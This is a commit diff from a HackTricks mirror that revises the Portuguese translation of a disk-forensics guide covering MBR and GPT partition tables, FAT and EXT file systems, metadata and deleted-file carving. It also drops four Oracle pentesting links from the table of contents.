Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 14:38:27 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['forensics/basic-forensic-methodology/partitions-file-system

Browse source
This commit is contained in:
Translator 2024-02-05 02:45:11 +00:00
parent 1f49c40ea0
commit 0dddb68df8
41 changed files with 2551 additions and 5161 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
SUMMARY.md
View file

@ -485,10 +485,6 @@
* [1433 - Pentesting MSSQL - Microsoft SQL Server](network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md)
* [Types of MSSQL Users](network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md)
* [1521,1522-1529 - Pentesting Oracle TNS Listener](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md)
* [Oracle Pentesting requirements installation](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
* [TNS Poison](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md)
* [Remote stealth pass brute force](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md)
* [Oracle RCE & more](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md)
* [1723 - Pentesting PPTP](network-services-pentesting/1723-pentesting-pptp.md)
* [1883 - Pentesting MQTT (Mosquitto)](network-services-pentesting/1883-pentesting-mqtt-mosquitto.md)
* [2049 - Pentesting NFS Service](network-services-pentesting/nfs-service-pentesting.md)

182
forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
View file

@ -4,34 +4,34 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## Partições
Um disco rígido ou um **SSD pode conter diferentes partições** com o objetivo de separar dados fisicamente.\
A **unidade mínima** de um disco é o **setor** (normalmente composto por 512B). Assim, cada tamanho de partição precisa ser múltiplo desse tamanho.
Um disco rígido ou um **disco SSD pode conter diferentes partições** com o objetivo de separar fisicamente os dados.\
A **unidade mínima** de um disco é o **setor** (normalmente composto por 512B). Portanto, o tamanho de cada partição precisa ser um múltiplo desse tamanho.
### MBR (Master Boot Record)
Está localizado no **primeiro setor do disco após os 446B do código de boot**. Este setor é essencial para indicar ao PC o que e de onde uma partição deve ser montada.\
Permite até **4 partições** (no máximo **apenas 1** pode ser ativa/**bootável**). No entanto, se você precisar de mais partições, pode usar **partições estendidas**. O **byte final** deste primeiro setor é a assinatura do registro de boot **0x55AA**. Apenas uma partição pode ser marcada como ativa.\
MBR permite **máximo de 2.2TB**.
É alocado no **primeiro setor do disco após os 446B do código de inicialização**. Este setor é essencial para indicar ao PC o que e de onde uma partição deve ser montada.\
Ele permite até **4 partições** (no máximo **apenas 1** pode ser ativa/**inicializável**). No entanto, se você precisar de mais partições, pode usar **partições estendidas**. O **último byte** deste primeiro setor é a assinatura do registro de inicialização **0x55AA**. Apenas uma partição pode ser marcada como ativa.\
MBR permite **máximo de 2,2TB**.
![](<../../../.gitbook/assets/image (489).png>)
![](<../../../.gitbook/assets/image (490).png>)
Dos **bytes 440 ao 443** do MBR, você pode encontrar a **Assinatura de Disco do Windows** (se o Windows for usado). A letra de unidade lógica do disco rígido depende da Assinatura de Disco do Windows. Alterar essa assinatura pode impedir que o Windows inicie (ferramenta: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
Dos **bytes 440 a 443** do MBR, você pode encontrar a **Assinatura do Disco do Windows** (se o Windows for usado). A letra da unidade lógica do disco rígido depende da Assinatura do Disco do Windows. Alterar esta assinatura pode impedir o Windows de inicializar (ferramenta: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
![](<../../../.gitbook/assets/image (493).png>)
@ -39,29 +39,29 @@ Dos **bytes 440 ao 443** do MBR, você pode encontrar a **Assinatura de Disco do
| Offset | Comprimento | Item |
| ----------- | ----------- | ------------------- |
| 0 (0x00) | 446(0x1BE) | Código de boot |
| 446 (0x1BE) | 16 (0x10) | Primeira Partição |
| 462 (0x1CE) | 16 (0x10) | Segunda Partição |
| 478 (0x1DE) | 16 (0x10) | Terceira Partição |
| 494 (0x1EE) | 16 (0x10) | Quarta Partição |
| 510 (0x1FE) | 2 (0x2) | Assinatura 0x55 0xAA|
| 0 (0x00) | 446(0x1BE) | Código de inicialização |
| 446 (0x1BE) | 16 (0x10) | Primeira Partição |
| 462 (0x1CE) | 16 (0x10) | Segunda Partição |
| 478 (0x1DE) | 16 (0x10) | Terceira Partição |
| 494 (0x1EE) | 16 (0x10) | Quarta Partição |
| 510 (0x1FE) | 2 (0x2) | Assinatura 0x55 0xAA |
**Formato do Registro de Partição**
| Offset | Comprimento | Item |
| --------- | ----------- | ------------------------------------------------------ |
| 0 (0x00) | 1 (0x01) | Bandeira ativa (0x80 = bootável) |
| 1 (0x01) | 1 (0x01) | Cabeça inicial |
| 2 (0x02) | 1 (0x01) | Setor inicial (bits 0-5); bits superiores do cilindro (6-7) |
| 3 (0x03) | 1 (0x01) | Cilindro inicial 8 bits inferiores |
| 4 (0x04) | 1 (0x01) | Código do tipo de partição (0x83 = Linux) |
| 5 (0x05) | 1 (0x01) | Cabeça final |
| 6 (0x06) | 1 (0x01) | Setor final (bits 0-5); bits superiores do cilindro (6-7) |
| 7 (0x07) | 1 (0x01) | Cilindro final 8 bits inferiores |
| 8 (0x08) | 4 (0x04) | Setores precedendo a partição (little endian) |
| 12 (0x0C) | 4 (0x04) | Setores na partição |
| 0 (0x00) | 1 (0x01) | Sinalizador ativo (0x80 = inicializável) |
| 1 (0x01) | 1 (0x01) | Cabeça de início |
| 2 (0x02) | 1 (0x01) | Setor de início (bits 0-5); bits superiores do cilindro (6- 7) |
| 3 (0x03) | 1 (0x01) | Bits mais baixos do cilindro de início |
| 4 (0x04) | 1 (0x01) | Código do tipo de partição (0x83 = Linux) |
| 5 (0x05) | 1 (0x01) | Cabeça final |
| 6 (0x06) | 1 (0x01) | Setor final (bits 0-5); bits superiores do cilindro (6- 7) |
| 7 (0x07) | 1 (0x01) | Bits mais baixos do cilindro final |
| 8 (0x08) | 4 (0x04) | Setores anteriores à partição (pouco endian) |
| 12 (0x0C) | 4 (0x04) | Setores na partição |
Para montar um MBR no Linux, você primeiro precisa obter o offset inicial (você pode usar `fdisk` e o comando `p`)
Para montar um MBR no Linux, primeiro você precisa obter o deslocamento de início (você pode usar `fdisk` e o comando `p`)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
@ -72,65 +72,65 @@ mount -o ro,loop,offset=<Bytes>
#63x512 = 32256Bytes
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
```
**LBA (Endereçamento de blocos lógicos)**
**LBA (Endereçamento de bloco lógico)**
**Endereçamento de blocos lógicos** (**LBA**) é um esquema comum usado para **especificar a localização de blocos** de dados armazenados em dispositivos de armazenamento de computadores, geralmente sistemas de armazenamento secundário como discos rígidos. LBA é um esquema de endereçamento linear particularmente simples; **blocos são localizados por um índice inteiro**, com o primeiro bloco sendo LBA 0, o segundo LBA 1, e assim por diante.
**Endereçamento de bloco lógico** (**LBA**) é um esquema comum usado para **especificar a localização de blocos** de dados armazenados em dispositivos de armazenamento de computador, geralmente sistemas de armazenamento secundário como discos rígidos. O LBA é um esquema de endereçamento linear particularmente simples; **os blocos são localizados por um índice inteiro**, sendo o primeiro bloco o LBA 0, o segundo LBA 1, e assim por diante.
### GPT (Tabela de Partição GUID)
É chamada Tabela de Partição GUID porque cada partição no seu disco tem um **identificador globalmente único**.
É chamada de Tabela de Partição GUID porque cada partição no seu disco tem um **identificador globalmente único**.
Assim como MBR, começa no **setor 0**. O MBR ocupa 32bits enquanto **GPT** usa **64bits**.\
GPT **permite até 128 partições** no Windows e até **9.4ZB**.\
Além disso, partições podem ter um nome Unicode de 36 caracteres.
Assim como o MBR, ela começa no **setor 0**. O MBR ocupa 32 bits enquanto o **GPT** usa **64 bits**.\
O GPT **permite até 128 partições** no Windows e até **9,4ZB**.\
Além disso, as partições podem ter um nome Unicode de 36 caracteres.
Em um disco MBR, os dados de particionamento e boot são armazenados em um único lugar. Se esses dados forem sobrescritos ou corrompidos, você terá problemas. Em contraste, **GPT armazena múltiplas cópias desses dados pelo disco**, então é muito mais robusto e pode se recuperar se os dados forem corrompidos.
Em um disco MBR, a partição e os dados de inicialização são armazenados em um único local. Se esses dados forem sobrescritos ou corrompidos, você terá problemas. Em contraste, o **GPT armazena várias cópias desses dados em todo o disco**, sendo muito mais robusto e capaz de recuperar os dados danificados.
GPT também armazena valores de **verificação de redundância cíclica (CRC)** para verificar se seus dados estão intactos. Se os dados estiverem corrompidos, GPT pode notar o problema e **tentar recuperar os dados danificados** de outro local no disco.
O GPT também armazena valores de **verificação de redundância cíclica (CRC)** para verificar se seus dados estão íntegros. Se os dados estiverem corrompidos, o GPT pode detectar o problema e **tentar recuperar os dados danificados** de outra localização no disco.
**MBR Protetor (LBA0)**
Para compatibilidade limitada com versões anteriores, o espaço do MBR legado ainda é reservado na especificação GPT, mas agora é usado de **uma maneira que impede que utilitários de disco baseados em MBR reconheçam erroneamente e possivelmente sobrescrevam discos GPT**. Isso é referido como um MBR protetor.
Para compatibilidade limitada com versões anteriores, o espaço do MBR legado ainda é reservado na especificação do GPT, mas agora é usado de uma **maneira que impede que utilitários de disco baseados em MBR reconheçam erroneamente e possivelmente sobrescrevam discos GPT**. Isso é chamado de MBR protetor.
![](<../../../.gitbook/assets/image (491).png>)
**MBR Híbrido (LBA 0 + GPT)**
Em sistemas operacionais que suportam **boot baseado em GPT através de serviços BIOS** em vez de EFI, o primeiro setor também pode ser usado para armazenar a primeira etapa do **código do bootloader**, mas **modificado** para reconhecer **partições GPT**. O bootloader no MBR não deve assumir um tamanho de setor de 512 bytes.
Em sistemas operacionais que suportam **inicialização baseada em GPT por meio de serviços BIOS** em vez de EFI, o primeiro setor também pode ser usado para armazenar o primeiro estágio do código do **carregador de inicialização**, mas **modificado** para reconhecer **partições GPT**. O carregador de inicialização no MBR não deve assumir um tamanho de setor de 512 bytes.
**Cabeçalho da tabela de partições (LBA 1)**
**Cabeçalho da tabela de partição (LBA 1)**
O cabeçalho da tabela de partições define os blocos utilizáveis no disco. Ele também define o número e tamanho das entradas de partição que compõem a tabela de partições (deslocamentos 80 e 84 na tabela).
O cabeçalho da tabela de partição define os blocos utilizáveis no disco. Também define o número e o tamanho das entradas de partição que compõem a tabela de partição (deslocamentos 80 e 84 na tabela).
| Deslocamento | Comprimento | Conteúdo |
| ------------ | ----------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 bytes | Assinatura ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h ou 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8) em máquinas little-endian) |
| 0 (0x00) | 8 bytes | Assinatura ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h ou 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)em máquinas little-endian) |
| 8 (0x08) | 4 bytes | Revisão 1.0 (00h 00h 01h 00h) para UEFI 2.8 |
| 12 (0x0C) | 4 bytes | Tamanho do cabeçalho em little endian (em bytes, geralmente 5Ch 00h 00h 00h ou 92 bytes) |
| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) do cabeçalho (deslocamento +0 até o tamanho do cabeçalho) em little endian, com este campo zerado durante o cálculo |
| 20 (0x14) | 4 bytes | Reservado; deve ser zero |
| 24 (0x18) | 8 bytes | LBA atual (localização desta cópia do cabeçalho) |
| 32 (0x20) | 8 bytes | LBA de backup (localização da outra cópia do cabeçalho) |
| 40 (0x28) | 8 bytes | Primeiro LBA utilizável para partições (último LBA da tabela de partição primária + 1) |
| 48 (0x30) | 8 bytes | Último LBA utilizável (primeiro LBA da tabela de partição secundária 1) |
| 56 (0x38) | 16 bytes | GUID do disco em mixed endian |
| 72 (0x48) | 8 bytes | LBA inicial de um array de entradas de partição (sempre 2 na cópia primária) |
| 80 (0x50) | 4 bytes | Número de entradas de partição no array |
| 84 (0x54) | 4 bytes | Tamanho de uma única entrada de partição (geralmente 80h ou 128) |
| 88 (0x58) | 4 bytes | CRC32 do array de entradas de partição em little endian |
| 92 (0x5C) | \* | Reservado; deve ser zeros para o resto do bloco (420 bytes para um tamanho de setor de 512 bytes; mas pode ser mais com tamanhos de setor maiores) |
| 12 (0x0C) | 4 bytes | Tamanho do cabeçalho em little-endian (em bytes, geralmente 5Ch 00h 00h 00h ou 92 bytes) |
| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) do cabeçalho (deslocamento +0 até o tamanho do cabeçalho) em little-endian, com este campo zerado durante o cálculo |
| 20 (0x14) | 4 bytes | Reservado; deve ser zero |
| 24 (0x18) | 8 bytes | LBA atual (localização desta cópia do cabeçalho) |
| 32 (0x20) | 8 bytes | LBA de backup (localização da outra cópia do cabeçalho) |
| 40 (0x28) | 8 bytes | Primeiro LBA utilizável para partições (último LBA da tabela de partição primária + 1) |
| 48 (0x30) | 8 bytes | Último LBA utilizável (primeiro LBA da tabela de partição secundária 1) |
| 56 (0x38) | 16 bytes | GUID do disco em endian misto |
| 72 (0x48) | 8 bytes | LBA inicial de uma matriz de entradas de partição (sempre 2 na cópia primária) |
| 80 (0x50) | 4 bytes | Número de entradas de partição na matriz |
| 84 (0x54) | 4 bytes | Tamanho de uma única entrada de partição (geralmente 80h ou 128) |
| 88 (0x58) | 4 bytes | CRC32 da matriz de entradas de partição em little-endian |
| 92 (0x5C) | \* | Reservado; deve ser zeros para o restante do bloco (420 bytes para um tamanho de setor de 512 bytes; mas pode ser mais com tamanhos de setor maiores) |
**Entradas de partição (LBA 233)**
| Formato de entrada de partição GUID | | |
| ----------------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
| Deslocamento | Comprimento | Conteúdo |
| 0 (0x00) | 16 bytes | [GUID do tipo de partição](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (mixed endian) |
| 16 (0x10) | 16 bytes | GUID único da partição (mixed endian) |
| 32 (0x20) | 8 bytes | Primeiro LBA ([little endian](https://en.wikipedia.org/wiki/Little\_endian)) |
| 40 (0x28) | 8 bytes | Último LBA (inclusivo, geralmente ímpar) |
| 48 (0x30) | 8 bytes | Flags de atributos (por exemplo, bit 60 denota somente leitura) |
| 56 (0x38) | 72 bytes | Nome da partição (36 unidades de código [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE) |
| Deslocamento | Comprimento | Conteúdo |
| 0 (0x00) | 16 bytes | [GUID do tipo de partição](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (endian misto) |
| 16 (0x10) | 16 bytes | GUID de partição único (endian misto) |
| 32 (0x20) | 8 bytes | Primeiro LBA ([little endian](https://en.wikipedia.org/wiki/Little\_endian)) |
| 40 (0x28) | 8 bytes | Último LBA (inclusive, geralmente ímpar) |
| 48 (0x30) | 8 bytes | Flags de atributo (por exemplo, o bit 60 denota somente leitura) |
| 56 (0x38) | 72 bytes | Nome da partição (36 unidades de código [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE) |
**Tipos de Partições**
@ -158,27 +158,27 @@ Se fosse uma **tabela GPT em vez de um MBR**, deveria aparecer a assinatura _EFI
### FAT
O sistema de arquivos **FAT (File Allocation Table)** é nomeado pelo seu método de organização, a tabela de alocação de arquivos, que reside no início do volume. Para proteger o volume, **duas cópias** da tabela são mantidas, caso uma seja danificada. Além disso, as tabelas de alocação de arquivos e a pasta raiz devem ser armazenadas em uma **localização fixa** para que os arquivos necessários para iniciar o sistema possam ser localizados corretamente.
O sistema de arquivos **FAT (File Allocation Table)** é nomeado por seu método de organização, a tabela de alocação de arquivos, que reside no início do volume. Para proteger o volume, **duas cópias** da tabela são mantidas, caso uma seja danificada. Além disso, as tabelas de alocação de arquivos e a pasta raiz devem ser armazenadas em uma **localização fixa** para que os arquivos necessários para iniciar o sistema possam ser localizados corretamente.
![](<../../../.gitbook/assets/image (495).png>)
A unidade mínima de espaço usada por este sistema de arquivos é um **cluster, tipicamente 512B** (que é composto por um número de setores).
A unidade de espaço mínima usada por este sistema de arquivos é um **cluster, tipicamente 512B** (que é composto por um número de setores).
O anterior **FAT12** tinha **endereços de cluster para valores de 12 bits** com até **4078** **clusters**; permitia até 4084 clusters com UNIX. O mais eficiente **FAT16** aumentou para **endereços de cluster de 16 bits** permitindo até **65,517 clusters** por volume. FAT32 usa endereço de cluster de 32 bits permitindo até **268,435,456 clusters** por volume
O antigo **FAT12** tinha endereços de cluster de valores de **12 bits** com até **4078 clusters**; permitia até 4084 clusters com UNIX. O mais eficiente **FAT16** aumentou para endereço de cluster de **16 bits** permitindo até **65.517 clusters** por volume. O FAT32 usa endereço de cluster de 32 bits permitindo até **268.435.456 clusters** por volume.
O **tamanho máximo de arquivo permitido pelo FAT é 4GB** (menos um byte) porque o sistema de arquivos usa um campo de 32 bits para armazenar o tamanho do arquivo em bytes, e 2^32 bytes = 4 GiB. Isso acontece para FAT12, FAT16 e FAT32.
O **tamanho máximo de arquivo permitido pelo FAT é de 4GB** (menos um byte) porque o sistema de arquivos usa um campo de 32 bits para armazenar o tamanho do arquivo em bytes, e 2^32 bytes = 4 GiB. Isso ocorre para FAT12, FAT16 e FAT32.
O **diretório raiz** ocupa uma **posição específica** tanto para FAT12 quanto FAT16 (em FAT32 ocupa uma posição como qualquer outra pasta). Cada entrada de arquivo/pasta contém estas informações:
O **diretório raiz** ocupa uma **posição específica** tanto para FAT12 quanto para FAT16 (no FAT32, ele ocupa uma posição como qualquer outra pasta). Cada entrada de arquivo/pasta contém estas informações:
* Nome do arquivo/pasta (máximo de 8 caracteres)
* Atributos
* Data de criação
* Data de modificação
* Data do último acesso
* Endereço da tabela FAT onde começa o primeiro cluster do arquivo
* Endereço da tabela FAT onde o primeiro cluster do arquivo começa
* Tamanho
Quando um arquivo é "excluído" usando um sistema de arquivos FAT, a entrada do diretório permanece quase **inalterada** exceto pelo **primeiro caractere do nome do arquivo** (modificado para 0xE5), preservando a maior parte do nome do arquivo "excluído", junto com seu carimbo de data/hora, comprimento do arquivo e — mais importante — sua localização física no disco. A lista de clusters de disco ocupados pelo arquivo será, no entanto, apagada da Tabela de Alocação de Arquivos, marcando aqueles setores disponíveis para uso por outros arquivos criados ou modificados posteriormente. No caso do FAT32, há adicionalmente um campo apagado responsável pelos 16 bits superiores do valor do cluster de início do arquivo.
Quando um arquivo é "excluído" usando um sistema de arquivos FAT, a entrada do diretório permanece quase **inalterada**, exceto pelo **primeiro caractere do nome do arquivo** (modificado para 0xE5), preservando a maior parte do nome do arquivo "excluído", juntamente com seu carimbo de tempo, comprimento do arquivo e — mais importante — sua localização física no disco. A lista de clusters de disco ocupados pelo arquivo será, no entanto, apagada da Tabela de Alocação de Arquivos, marcando esses setores como disponíveis para uso por outros arquivos criados ou modificados posteriormente. No caso do FAT32, há também um campo apagado adicional responsável pelos 16 bits superiores do valor do cluster de início do arquivo.
### **NTFS**
@ -188,7 +188,7 @@ Quando um arquivo é "excluído" usando um sistema de arquivos FAT, a entrada do
### EXT
**Ext2** é o sistema de arquivos mais comum para partições **sem journaling** (**partições que não mudam muito**) como a partição de boot. **Ext3/4** são **journaling** e são usados geralmente para as **demais partições**.
**Ext2** é o sistema de arquivos mais comum para **partições sem journaling** (**partições que não mudam muito**) como a partição de inicialização. **Ext3/4** são **com journaling** e são usados geralmente para as **outras partições**.
{% content-ref url="ext.md" %}
[ext.md](ext.md)
@ -196,7 +196,7 @@ Quando um arquivo é "excluído" usando um sistema de arquivos FAT, a entrada do
## **Metadados**
Alguns arquivos contêm metadados. Essas informações são sobre o conteúdo do arquivo, o que às vezes pode ser interessante para um analista, pois dependendo do tipo de arquivo, pode ter informações como:
Alguns arquivos contêm metadados. Essas informações são sobre o conteúdo do arquivo, que às vezes pode ser interessante para um analista, pois dependendo do tipo de arquivo, pode conter informações como:
* Título
* Versão do MS Office usada
@ -208,34 +208,34 @@ Alguns arquivos contêm metadados. Essas informações são sobre o conteúdo do
Você pode usar ferramentas como [**exiftool**](https://exiftool.org) e [**Metadiver**](https://www.easymetadata.com/metadiver-2/) para obter os metadados de um arquivo.
## **Recuperação de Arquivos Excluídos**
## **Recuperação de Arquivos Deletados**
### Arquivos Excluídos Registrados
### Arquivos Deletados Registrados
Como foi visto antes, há vários lugares onde o arquivo ainda está salvo depois de ser "excluído". Isso ocorre porque geralmente a exclusão de um arquivo de um sistema de arquivos apenas o marca como excluído, mas os dados não são tocados. Então, é possível inspecionar os registros dos arquivos (como o MFT) e encontrar os arquivos excluídos.
Como visto anteriormente, existem vários locais onde o arquivo ainda é salvo após ser "excluído". Isso ocorre porque geralmente a exclusão de um arquivo de um sistema de arquivos apenas o marca como excluído, mas os dados não são tocados. Portanto, é possível inspecionar os registros dos arquivos (como o MFT) e encontrar os arquivos excluídos.
Além disso, o sistema operacional geralmente salva muitas informações sobre mudanças no sistema de arquivos e backups, então é possível tentar usá-los para recuperar o arquivo ou o máximo de informações possível.
Além disso, o sistema operacional geralmente salva muitas informações sobre alterações no sistema de arquivos e backups, então é possível tentar usá-los para recuperar o arquivo ou o máximo de informações possível.
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### **File Carving**
### **Escultura de Arquivos**
**File carving** é uma técnica que tenta **encontrar arquivos no volume de dados**. Existem 3 maneiras principais de ferramentas como essa funcionarem: **Baseadas em cabeçalhos e rodapés de tipos de arquivos**, baseadas em **estruturas de tipos de arquivos** e baseadas no **conteúdo** em si.
**Escultura de arquivos** é uma técnica que tenta **encontrar arquivos no volume de dados**. Existem 3 principais maneiras como ferramentas desse tipo funcionam: **Com base nos cabeçalhos e rodapés dos tipos de arquivo**, com base nas **estruturas dos tipos de arquivo** e com base no **próprio conteúdo**.
Note que essa técnica **não funciona para recuperar arquivos fragmentados**. Se um arquivo **não estiver armazenado em setores contíguos**, então essa técnica não será capaz de encontrá-lo ou pelo menos parte dele.
Observe que essa técnica **não funciona para recuperar arquivos fragmentados**. Se um arquivo **não estiver armazenado em setores contíguos**, então essa técnica não será capaz de encontrá-lo ou pelo menos parte dele.
Existem várias ferramentas que você pode usar para file Carving indicando os tipos de arquivos que deseja procurar
Existem várias ferramentas que você pode usar para Escultura de Arquivos indicando os tipos de arquivo que deseja procurar
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### Carving de Fluxo de Dados
### **Escultura de Fluxo de Dados**
Carving de Fluxo de Dados é semelhante ao File Carving, mas **em vez de procurar por arquivos completos, procura por fragmentos de informação interessantes**.\
Por exemplo, em vez de procurar por um arquivo completo contendo URLs registradas, essa técnica procurará por URLs.
A Escultura de Fluxo de Dados é semelhante à Escultura de Arquivos, mas **em vez de procurar arquivos completos, ela procura fragmentos interessantes** de informações.\
Por exemplo, em vez de procurar um arquivo completo contendo URLs registrados, essa técnica procurará URLs.
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
@ -243,8 +243,8 @@ Por exemplo, em vez de procurar por um arquivo completo contendo URLs registrada
### Exclusão Segura
Obviamente, existem maneiras de **excluir "seguramente" arquivos e partes dos registros sobre eles**. Por exemplo, é possível **sobrescrever o conteúdo** de um arquivo com dados inúteis várias vezes, e então **remover** os **registros** do **$MFT** e **$LOGFILE** sobre o arquivo, e **remover as Cópias de Sombra do Volume**.\
Você pode notar que mesmo realizando essa ação ainda pode haver **outras partes onde a existência do arquivo ainda está registrada**, e isso é verdade e parte do trabalho do profissional de forense é encontrá-las.
Obviamente, existem maneiras de **excluir arquivos "de forma segura" e parte dos logs sobre eles**. Por exemplo, é possível **sobrescrever o conteúdo** de um arquivo com dados inúteis várias vezes e, em seguida, **remover** os **logs** do **$MFT** e **$LOGFILE** sobre o arquivo, e **remover as Cópias de Sombra do Volume**.\
Você pode notar que mesmo realizando essa ação, pode haver **outras partes onde a existência do arquivo ainda está registrada**, e isso é verdade e faz parte do trabalho do profissional forense encontrar essas informações.
## Referências
@ -253,15 +253,3 @@ Você pode notar que mesmo realizando essa ação ainda pode haver **outras part
* [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html)
* [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
* **iHackLabs Certified Digital Forensics Windows**
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Obtenha o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospol

215
forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md
View file

@ -1,44 +1,44 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
